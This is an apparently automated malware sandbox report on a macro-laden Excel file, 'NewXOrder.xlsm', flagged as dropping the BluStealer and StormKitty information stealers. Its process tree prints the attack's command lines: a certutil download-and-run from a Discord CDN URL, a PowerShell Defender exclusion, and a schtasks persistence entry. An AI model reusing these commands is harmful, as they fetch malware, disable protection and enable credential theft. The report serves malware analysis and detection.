Analysis
-
max time kernel
150s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
15-08-2022 06:51
General
-
Target
NewXOrder.xlsm
-
Size
42KB
-
MD5
1f972129c268128a9e63b03f166cd65a
-
SHA1
e19b5eed24f6d881338793e9f7218ff99c1d7981
-
SHA256
b80d30b287b4ba5c153bac042a1a9eec6d746181b893717cbcb05ed3180d8d71
-
SHA512
421fc17d3bb396d84907190a46df51851ddfafc7549e15f728f4a549d27f9fe2ab2723e0126599f260c58a3e165a5e128cc677a0cdeb7839e3e7e39ac6a0d90b
Malware Config
Signatures
-
BluStealer
A Modular information stealer written in Visual Basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 13 IoCs
-
Suspicious use of WriteProcessMemory 26 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\NewXOrder.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c certutil.exe -urlcache -split -f "https://cdn.discordapp.com/attachments/1006822561709047861/1008583809245126708/New_Order.exe" Dqfmwyjfhy.exe.exe && Dqfmwyjfhy.exe.exe2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certutil.execertutil.exe -urlcache -split -f "https://cdn.discordapp.com/attachments/1006822561709047861/1008583809245126708/New_Order.exe" Dqfmwyjfhy.exe.exe3⤵
-
-
C:\Users\Admin\Documents\Dqfmwyjfhy.exe.exeDqfmwyjfhy.exe.exe3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\RAUXoDciVwKR.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAUXoDciVwKR" /XML "C:\Users\Admin\AppData\Local\Temp\tmpAE8.tmp"4⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\Documents\Dqfmwyjfhy.exe.exe"C:\Users\Admin\Documents\Dqfmwyjfhy.exe.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe5⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f4771cbe522ae5adc92b247eb709341c
SHA1cbf2573923e960d6431e84ca392917aa352c8f26
SHA256f14ec2ff2b41ada3fdf1afcd3babd672d310e86c484619dc60d35eeb59e49c3a
SHA512307a71f810707a4eb99614bed9e3577f8cc700905c1956fea12acf8a82f7c9176098e0e71802826c8b44dfbd0f533aa22d55d58be412fee7a83f76e77b88abfe
-
Filesize
847KB
MD5200bbb757192fb530d38711a112338ba
SHA1259c77525cf161a376a07ed9a035c3064e2a1f17
SHA256dfdea8e5cc329e17847e129d8e515043b0dba31f1af48304f28dd181483607ae
SHA512b387ea9263598db899501f202f754e0bbc39b72be177857809a70fc4608310b46e00fe9d96e9cc00d2a2c9ce48bec764f0f4aaa989724d0079711b8cd37866ea
-
Filesize
847KB
MD5200bbb757192fb530d38711a112338ba
SHA1259c77525cf161a376a07ed9a035c3064e2a1f17
SHA256dfdea8e5cc329e17847e129d8e515043b0dba31f1af48304f28dd181483607ae
SHA512b387ea9263598db899501f202f754e0bbc39b72be177857809a70fc4608310b46e00fe9d96e9cc00d2a2c9ce48bec764f0f4aaa989724d0079711b8cd37866ea
-
Filesize
847KB
MD5200bbb757192fb530d38711a112338ba
SHA1259c77525cf161a376a07ed9a035c3064e2a1f17
SHA256dfdea8e5cc329e17847e129d8e515043b0dba31f1af48304f28dd181483607ae
SHA512b387ea9263598db899501f202f754e0bbc39b72be177857809a70fc4608310b46e00fe9d96e9cc00d2a2c9ce48bec764f0f4aaa989724d0079711b8cd37866ea
-
Filesize
40KB
-
Filesize
120KB
-
Filesize
6.5MB
-
Filesize
216KB
-
Filesize
120KB
-
Filesize
600KB
-
Filesize
56KB
-
Filesize
304KB
-
Filesize
200KB
-
Filesize
104KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
104KB
-
Filesize
6.2MB
-
Filesize
32KB
-
Filesize
104KB
-
Filesize
148KB
-
Filesize
148KB
-
Filesize
148KB
-
Filesize
148KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
40KB
-
Filesize
864KB
-
Filesize
584KB
-
Filesize
5.6MB
-
Filesize
624KB